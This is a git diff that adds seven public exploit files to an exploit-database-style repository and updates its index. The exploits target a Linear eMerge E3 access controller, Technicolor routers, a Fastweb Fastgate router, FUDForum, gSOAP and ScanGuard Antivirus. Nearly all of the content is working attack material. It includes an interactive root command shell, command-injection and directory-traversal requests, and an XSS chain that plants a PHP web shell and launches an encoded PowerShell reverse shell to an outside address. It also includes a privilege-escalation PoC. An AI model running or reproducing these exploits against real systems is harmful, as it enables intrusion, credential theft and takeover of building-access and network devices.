diff --git a/exploits/hardware/webapps/47649.py b/exploits/hardware/webapps/47649.py new file mode 100755 index 000000000..05676fdd0 --- /dev/null +++ b/exploits/hardware/webapps/47649.py @@ -0,0 +1,116 @@ +# Title: Linear eMerge E3 1.00-06 - Remote Code Execution +# Author: LiquidWorm +# Date: 2019-11-13 +# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ +# Software Link: http://linear-solutions.com/nsc_family/e3-series/ +# Affected version: <=2.3.0a +# Advisory: https://applied-risk.com/resources/ar-2019-005 +# Paper: https://applied-risk.com/resources/i-own-your-building-management-system +# CVE: CVE-2019-7256 + +#!/usr/bin/env python +# +# Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit +# Affected version: <=1.00-06 +# via card_scan_decoder.php +# CVE: CVE-2019-7256 +# Advisory: https://applied-risk.com/resources/ar-2019-005 +# Paper: https://applied-risk.com/resources/i-own-your-building-management-system +# +# By Gjoko 'LiquidWorm' Krstic +# +######################################################################### +# lqwrm@metalgear:~/stuff$ python emergeroot2.py 192.168.1.2 +# Do you want me to try and get the web front-end credentials? (y/n) y +# ID='admin',Password='MakeLoveNotWar!' +# +# lighttpd@192.168.1.2:/spider/web/webroot$ id +# uid=1003(lighttpd) gid=0(root) +# +# lighttpd@192.168.1.2:/spider/web/webroot$ cat /etc/version +# Software Version: 1.00.03 +# Image: nxgcpub-image +# Built by: jenkins +# +# lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id +# Password: +# uid=0(root) gid=0(root) groups=0(root) +# +# lighttpd@192.168.1.2:/spider/web/webroot$ exit +# +# [+] Erasing read stage file and exiting... +# [+] Done. Ba-bye! +# +######################################################################### + +import requests +import time#### +import sys##### +import os###### +import re###### + +piton = os.path.basename(sys.argv[0]) + +if len(sys.argv) < 2: + print ''' + ..... + .e$$$$$$$$$$$$$$e. + z$$ ^$$$$$$$$$$$$$$$$$. + .$$$* J$$$$$$$$$$$$$$$$$$$e + .$" .$$$$$$$$$$$$$$$$$$$$$$*- + .$ $$$$$$$$$$$$$$$$***$$ .ee" + z**$$ $$r ^**$$$$$$$$$*" .e$$$$$$*" + " -\e$$ 4$$$$. .ze$$$"""" + 4 z$$$$$ $$$$$$$$$$$$$$$$$$$$" + $$$$$$$$ .$$$$$$$$$$$**$$$$*" + z$$" $$ $$$$P*"" J$*$$c + $$" $$F .$$$ $$ ^$$ + $$ *$$c.z$$$ $$ $$ + $P $$$$$$$ 4$F 4$ + dP *$$$" $$ '$r + .$ J$" $" + $ $P 4$ + F $$ 4$ + 4$% 4$ + $$ 4$ + d$" $$ + $P $$ + $$ $$ + 4$% $$ + $$ $$ + d$ $$ + $F "3 + r=4e=" ... ..rf . ""% + $**$*"^""=..^4*=4=^"" ^""" + ''' + print '\n\x20\x20[+] Linear eMerge E3 Remote Root Exploit' + print '\x20\x20[-] by lqwrm (c) 2019' + print '\n\x20\x20[*] Usage: '+piton+' \n' + sys.exit() + +ipaddr = sys.argv[1] + +creds = raw_input('Do you want me to try and get the web front-end credentials? (y/n) ') +if creds.strip() == 'y': + frontend = '''grep "Controller" /tmp/SpiderDB/Spider.db |cut -f 5,6 -d ',' |grep ID''' + requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+frontend+' > test.txt%60') + showme = requests.get('http://'+ipaddr+'/test.txt') + print showme.text + +while True: + try: + cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ') + execute = requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+cmd+' > test.txt%60') + #time.sleep(1); + readreq = requests.get('http://'+ipaddr+'/test.txt') + print readreq.text + if cmd.strip() == 'exit': + print "[+] Erasing read stage file and exiting..." + requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&ReaderNo=%60rm test.txt%60') + print "[+] Done. Ba-bye!\n" + break + else: continue + except Exception: + break + +sys.exit() \ No newline at end of file diff --git a/exploits/hardware/webapps/47651.txt b/exploits/hardware/webapps/47651.txt new file mode 100644 index 000000000..c209a9342 --- /dev/null +++ b/exploits/hardware/webapps/47651.txt @@ -0,0 +1,24 @@ +# Exploit Title: Technicolor TD5130.2 - Remote Command Execution +# Date: 2019-11-12 +# Exploit Author: João Teles +# Vendor Homepage: https://www.technicolor.com/ +# Version: TD5130v2 +# Firmware Version: OI_Fw_V20 +# CVE : CVE-2019-18396 + +--------------------------- + +POST /mnt_ping.cgi HTTP/1.1 +Host: HOST +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http:/HOST/mnt_ping.cgi +Content-Type: application/x-www-form-urlencoded +Content-Length: 53 +Cookie: session=COOKIE +Connection: close +Upgrade-Insecure-Requests: 1 + +isSubmit=1&addrType=3&pingAddr=;ls&send=Send \ No newline at end of file diff --git a/exploits/hardware/webapps/47652.py b/exploits/hardware/webapps/47652.py new file mode 100755 index 000000000..92593a82c --- /dev/null +++ b/exploits/hardware/webapps/47652.py @@ -0,0 +1,89 @@ +# Exploit Title: Technicolor TC7300.B0 - 'hostname' Persistent Cross-Site Scripting +# Google Dork: N/A +# Date: 2019-11-11 +# Exploit Author: Luis Stefan +# Vendor Homepage: https://www.technicolor.com/ +# Software Link: N/A +# Version: TC7300.B0 - STFA.51.20 +# Tested on: macOS Mojave and Catalina +# CVE : + +#!/usr/bin/env python3 +__author__ = "Luis Stefan" +__license__ = "MIT" +__version__ = "1.0" +__email__ = "luis.ss@protonmail.com" +__description__ = """CVE-2019-17524.py: This script is used to exploit a xss vulnerability found in a technicolor device.""" + +from enum import IntEnum +from scapy.all import * +import codecs, threading, time + +# Define your network interface +interface = 'en0' +# Insert your interface card mac address +mac = 'xx:xx:xx:xx:xx:xx' +broadcast = 'ff:ff:ff:ff:ff:ff' +mac_hxd = codecs.decode(mac.replace(':', ''),'hex') + +class Bootp(IntEnum): + Discover = 1 + Offer = 2 + Request = 3 + Decline = 4 + Ack = 5 + Nak = 6 + Release = 7 + +def dhcp_discover(): + disc_pkt = Ether(src=mac, dst=broadcast) / \ + IP(src='0.0.0.0', dst='255.255.255.255') / \ + UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \ + DHCP(options=[('message-type', 'discover'), 'end']) + sendp(disc_pkt, iface=interface) + +def dhcp_request(pkt): + yraddr = pkt['BOOTP'].yraddr + # gwaddr == Gateway Ip Address + gwaddr = '192.168.0.1' + param_req_list = [] + hostname = "" + req_pkt = Ether(src=mac, dst=broadcast) / \ + IP(src='0.0.0.0', dst='255.255.255.255') / \ + UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \ + DHCP(options=[('message-type', 'request'), ('server_id', gwaddr), + ('requested_addr', yraddr), ('hostname', hostname), 'end']) + sendp(req_pkt, iface=interface) + +def dhcp(pkt): + print(pkt.display()) + print("#############################################################") + if pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Offer: + dhcp_request(pkt) + elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Ack: + print("Server Acknowledged") + sys.exit(0) + elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Decline: + print("Server Declined") + sys.exit(0) + elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Nak: + print("Server Nak") + sys.exit(0) + + +def ver_dhcp(): + print("Verifying DHCP port traffic..") + sniff(iface=interface, prn=dhcp, filter="port 68 and port 67", timeout=20) + sys.exit(0) + + +def main(): + t1 = threading.Thread(target=ver_dhcp, args=()) + t1.setDaemon = True + t1.start() + time.sleep(2) + dhcp_discover() + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/hardware/webapps/47654.py b/exploits/hardware/webapps/47654.py new file mode 100755 index 000000000..f454f6a89 --- /dev/null +++ b/exploits/hardware/webapps/47654.py @@ -0,0 +1,84 @@ +# Exploit Title: Fastweb Fastgate 0.00.81 - Remote Code Execution +# Date: 2019-11-13 +# Exploit Author: Riccardo Gasparini +# Vendor Homepage: https://www.fastweb.it/ +# Software Link: http://59.0.121.191:8080/ACS-server/file/0.00.81_FW_200_Askey (only from Fastweb ISP network) +# Version: 0.00.81 +# Tested on: Linux +# CVE : N/A + +import requests, json, time, sys + +current_milli_time = lambda: int(round(time.time() * 1000)) + +password='XXXXXXXXXXXXXXX' + +if password == 'XXXXXXXXXXXXXXX': + print("Password is set to XXXXXXXXXXXXXXX\nOpen the script and change the password") + sys.exit(-1) + +#get XSRF-TOKEN +headers = { + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36', + 'Referer': 'http://192.168.1.254/tr069', +} +params = () +response = requests.get('http://192.168.1.254', headers=headers) + +#login request and get sessionKey +xsrfToken=response.cookies['XSRF-TOKEN'] +cookies = { + 'XSRF-TOKEN': xsrfToken, +} +headers = { + 'Pragma': 'no-cache', + 'X-XSRF-TOKEN': xsrfToken, + 'Accept-Language': 'en-US,en-GB;q=0.9,en;q=0.8,it-IT;q=0.7,it;q=0.6,es;q=0.5,de;q=0.4', + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36', + 'Accept': 'application/json, text/plain, */*', + 'Referer': 'http://192.168.1.254/tr069', + 'Accept-Encoding': 'gzip, deflate', + 'Connection': 'keep-alive', + 'Cache-Control': 'no-cache', +} +params = ( + ('_', str(current_milli_time())), + ('cmd', '3'), + ('nvget', 'login_confirm'), + ('password', password), + ('remember_me', '1'), + ('sessionKey', 'NULL'), + ('username', 'admin'), +) + +response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies) + +jsonResponse = json.loads(response.text) +sessionKey=jsonResponse["login_confirm"]["check_session"] + +print("Executing command reboot\n") + +#some commands as example are shown below in the mount parameter +params = ( + ('_', str(current_milli_time())), + ('act','nvset'), + ('service','usb_remove'), + #Code execution + #('mount','&ping -c 10 192.168.1.172&'), + #('mount','&dropbear -r /etc/dropbear/dropbear_rsa_host_key&'),#to enable SSH + ('mount','&reboot&'), + ('sessionKey', sessionKey), +) +response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies) +print(response.text) + +#logout +params = ( + ('_', str(current_milli_time())), + ('cmd', '5'), + ('nvget', 'login_confirm'), + ('sessionKey', sessionKey), +) + +response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies) +print(json.dumps(json.loads(response.text), indent=2)) \ No newline at end of file diff --git a/exploits/php/webapps/47650.txt b/exploits/php/webapps/47650.txt new file mode 100644 index 000000000..1874ffca7 --- /dev/null +++ b/exploits/php/webapps/47650.txt @@ -0,0 +1,103 @@ +# Exploit Title : FUDForum 3.0.9 - Remote Code Execution +# Date: 2019-10-26 +# Exploit Author: liquidsky (JMcPeters) +# Vulnerable Software: FUDForum 3.0.9 +# Vendor Homepage: https://sourceforge.net/projects/fudforum/ +# Version: 3.0.9 +# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download +# Tested On: Windows / mysql / apache +# Author Site: https://github.com/fuzzlove/FUDforum-XSS-RCE +# Demo: https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks +# CVE: CVE-2019-18873 + + +// Greetz : wetw0rk, Fr13ndz, offsec =) +// +// Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution. +// The areas impacted are the admin panel and the forum. +// +// XSS via username in Forum: +// 1. Register an account and log in to the forum. +// 2. Go to the user control panel. -> Account Settings -> change login +// 3. Insert javascript payload +// 4. When the admin visits the user information the payload will fire, uploading a php shell on the remote system. +// +// XSS via user-agent in Admin Panel: +// 1. Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity. +// 2. Send the XSS payload below (from an IP associated with an account) / host the script: +// 3. curl -A '' http://target.machine/fudforum/index.php +// 4. When the admin visits the user information from the admin controls / User Manager the payload will fire under "Recent sessions", uploading a php shell on the remote system. +// + +function patience() +{ + var u=setTimeout("grabShell()",5000); +} + +// This function is to call the reverse shell php script (liquidsky.php). +// currently using a powershell payload that will need to be modified. +function grabShell() +{ + var url ="/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75%41%47%63%41%64%41%42%6f%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a%51%42%34%41%48%51%41%4c%67%42%42%41%46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%31%41%48%4d%41%61%41%41%6f%41%43%6b%41%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41"; + xhr = new XMLHttpRequest(); + xhr.open("GET", url, true); + xhr.send(null); + +} + +function submitFormWithTokenJS(token) { + var xhr = new XMLHttpRequest(); + xhr.open("POST", '/fudforum/adm/admbrowse.php', true); + + // Send the proper header information along with the request + xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=-----------------------------9703186584101745941654835853"); + + var currentdir = "C:/xampp/htdocs/fudforum"; // webroot - forum directory + var fileName = "liquidsky.php"; + var url = "/fudforum/adm/admbrowse.php"; + var ctype = "application/x-php"; + var fileData = "'; $cmd = ($_REQUEST['cmd']); system($cmd); echo ''; die; }?>"; + var boundary = "-----------------------------9703186584101745941654835853"; + var fileSize = fileData.length; + + var body = "--" + boundary + "\r\n"; + body += 'Content-Disposition: form-data; name="cur"\r\n\r\n'; + body += currentdir + "\r\n"; + body += "--" + boundary + "\r\n"; + body += 'Content-Disposition: form-data; name="SQ"\r\n\r\n'; + body += token + "\r\n"; + body += "--" + boundary + "\r\n"; + body += 'Content-Disposition: form-data; name="fname"; filename="' + fileName + '"\r\n'; + body += "Content-Type: " + ctype + "\r\n\r\n"; + body += fileData + "\r\n\r\n"; + body += "--" + boundary + "\r\n"; + body += 'Content-Disposition: form-data; name="tmp_f_val"\r\n\r\n'; + body += "1" + "\r\n"; + body += "--" + boundary + "\r\n"; + body += 'Content-Disposition: form-data; name="d_name"\r\n\r\n'; + body += fileName + "\r\n"; + body += "--" + boundary + "\r\n"; + body += 'Content-Disposition: form-data; name="file_upload"\r\n\r\n'; + body += "Upload File" + '\r\n'; + body += "--" + boundary + "--"; + + xhr.send(body); +} + +//Grab SQ token +var req = new XMLHttpRequest(); + +req.onreadystatechange=function() +{ + if (req.readyState == 4 && req.status == 200) { + var htmlPage = req.responseXML; /* fetch html */ + var SQ = htmlPage.getElementsByTagName("input")[0] + submitFormWithTokenJS(SQ.value); + } +} + +req.open("GET", "/fudforum/adm/admuser.php", true); +req.responseType = "document"; +req.send(); + +patience(); \ No newline at end of file diff --git a/exploits/php/webapps/47653.txt b/exploits/php/webapps/47653.txt new file mode 100644 index 000000000..1454f551f --- /dev/null +++ b/exploits/php/webapps/47653.txt @@ -0,0 +1,27 @@ +# Title: gSOAP 2.8 - Directory Traversal +# Author: Numan Türle +# Date: 2019-11-13 +# Vendor Homepage: https://www.genivia.com/ +# Version : gSOAP 2.8 +# Software Link : https://www.genivia.com/products.html#gsoap + + +POC +--------- + +GET /../../../../../../../../../etc/passwd HTTP/1.1 +Host: 10.200.106.101 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 +Connection: close + +Response +--------- +HTTP/1.1 200 OK +Server: gSOAP/2.8 +Content-Type: application/octet-stream +Content-Length: 51 +Connection: close + +root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh \ No newline at end of file diff --git a/exploits/windows/local/47656.txt b/exploits/windows/local/47656.txt new file mode 100644 index 000000000..46a2a55c6 --- /dev/null +++ b/exploits/windows/local/47656.txt @@ -0,0 +1,160 @@ +# Exploit Title: ScanGuard Antivirus 2020 - Insecure Folder Permissions +# Date: 2019-10-10 +# Exploit Author: hyp3rlinx +# Vendor Homepage: https://www.scanguard.com/ +# Software Link: https://support.scanguard.com/en/kb/22/upgrades-available +# Version: 2020 +# Tested on: Windows +# CVE : N/A +# Category: exploit + + +SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt + +[+] Credits: hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt +[+] ISR: ApparitionSec + + +[Vendor] +https://www.scanguard.com + + +[Product] +ScanGuard Antivirus +ScanGuard_Setup.exe Hash: 1a63c67a249da0c2e9abd09d35c3c65d + +Complete Antivirus & Security Software + + +[Vulnerability Type] +Insecure Permissions + + +[CVE Reference] +CVE-2019-18895 + + +[Affected Product Code Base] +ScanGuard Antivirus - latest + + +[Affected Component] +Permissions on installation directory + + +[Attack Type] +Local + + +[Impact Code execution] +true + + +[Impact Escalation of Privileges] +true + + +[Impact Information Disclosure] +true + + +[Attack Vectors] +Low integrity malware or non-privileged user replaces an executable to gain Admin privileges. + + +[Reference] +https://support.scanguard.com/en/kb/22/upgrades-available + + +[Security Issue] +Scanguard through 2019-11-12 on Windows has Insecure Permissions for the installation directory, leading to +privilege escalation via a Trojan horse executable file. + +The product sets weak access control restrictions, as permissions are set to Full Control for Everyone group. +This can allow low integrity malware the ability to replace ScanGuard executables. + + +C:\Program Files (x86)\ScanGuard\bins BUILTIN\Users:(OI)(CI)(ID)F + Everyone:(OI)(CI)(ID)F + NT SERVICE\TrustedInstaller:(ID)F + NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F + NT AUTHORITY\SYSTEM:(ID)F + + +[Exploit/POC] + +#include +#include +#define TARGET "C:\\Program Files (x86)\\ScanGuard\\ScanGuard.exe" +#define DISABLED_TARGET "C:\\Program Files (x86)\\ScanGuard\\~.conf" + +/* ScanGuard EoP + PoC By hyp3rlinx */ + +BOOL PWNED=FALSE; + +BOOL FileExists(LPCTSTR szPath){ + DWORD dwAttrib = GetFileAttributes(szPath); + return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY)); +} + +void main(void){ + + if(!FileExists(DISABLED_TARGET)){ + rename(TARGET, DISABLED_TARGET); + printf("[+] ScanGuard Antivirus EoP PoC\n"); + Sleep(300); + printf("[+] Disabled ScanGuard.exe ...\n"); + Sleep(300); + }else{ + PWNED=TRUE; + } + + char fname[MAX_PATH]; + char newLoc[]=TARGET; + + DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH); + if (size){ + if(!PWNED){ + printf("[+] Copying exploit to vuln dir...\n"); + Sleep(300); + CopyFile(fname, newLoc, FALSE); + printf("[+] Replaced legit ScanGuard...\n"); + Sleep(300); + printf("[+] Done!\n"); + Sleep(300); + MoveFile(fname, "c:\\Program Files (x86)\\ScanGuard\\ScamGuard.lnk"); + Sleep(2000); + exit(0); + }else{ + if(FileExists("ScamGuard.lnk")){ + system("DEL /f ScamGuard.lnk"); + } + printf("[+] ScamGuard PWNED!!!"); + printf("[+] By hyp3rlinx\n"); + system("pause"); + } + } +} + + +[Disclosure Timeline] +Vendor Notification: September 16, 2019 +Received vendor acknowledgement: September 16, 2019 +Second contact follow up: September 29, 2019 +No more vendor replies. +November 12, 2019 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 6719156fb..7831d9062 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10770,6 +10770,7 @@ id,file,description,date,author,type,platform,port 47642,exploits/windows/local/47642.txt,"RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path",2019-11-12,chuyreds,local,windows, 47645,exploits/windows/local/47645.py,"Control Center PRO 6.2.9 - Local Stack Based Buffer Overflow (SEH)",2019-11-12,sasaga92,local,windows, 47647,exploits/windows/local/47647.txt,"Wondershare Application Framework Service - _WsAppService_ Unquote Service Path",2019-11-12,chuyreds,local,windows, +47656,exploits/windows/local/47656.txt,"ScanGuard Antivirus 2020 - Insecure Folder Permissions",2019-11-13,hyp3rlinx,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -41964,3 +41965,9 @@ id,file,description,date,author,type,platform,port 47643,exploits/aspx/webapps/47643.txt,"Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting",2019-11-12,Cy83rl0gger,webapps,aspx, 47644,exploits/hardware/webapps/47644.py,"FlexAir Access Control 2.3.35 - Authentication Bypass",2019-11-12,LiquidWorm,webapps,hardware, 47648,exploits/hardware/webapps/47648.txt,"Bematech Printer MP-4200 - Denial of Service",2019-11-12,"Jonatas Fil",webapps,hardware, +47649,exploits/hardware/webapps/47649.py,"Linear eMerge E3 1.00-06 - Remote Code Execution",2019-11-13,LiquidWorm,webapps,hardware, +47650,exploits/php/webapps/47650.txt,"FUDForum 3.0.9 - Remote Code Execution",2019-11-13,liquidsky,webapps,php, +47651,exploits/hardware/webapps/47651.txt,"Technicolor TD5130.2 - Remote Command Execution",2019-11-13,"João Teles",webapps,hardware, +47652,exploits/hardware/webapps/47652.py,"Technicolor TC7300.B0 - 'hostname' Persistent Cross-Site Scripting",2019-11-13,"Luis Santana",webapps,hardware, +47653,exploits/php/webapps/47653.txt,"gSOAP 2.8 - Directory Traversal",2019-11-13,"numan türle",webapps,php, +47654,exploits/hardware/webapps/47654.py,"Fastweb Fastgate 0.00.81 - Remote Code Execution",2019-11-13,"Riccardo Gasparini",webapps,hardware,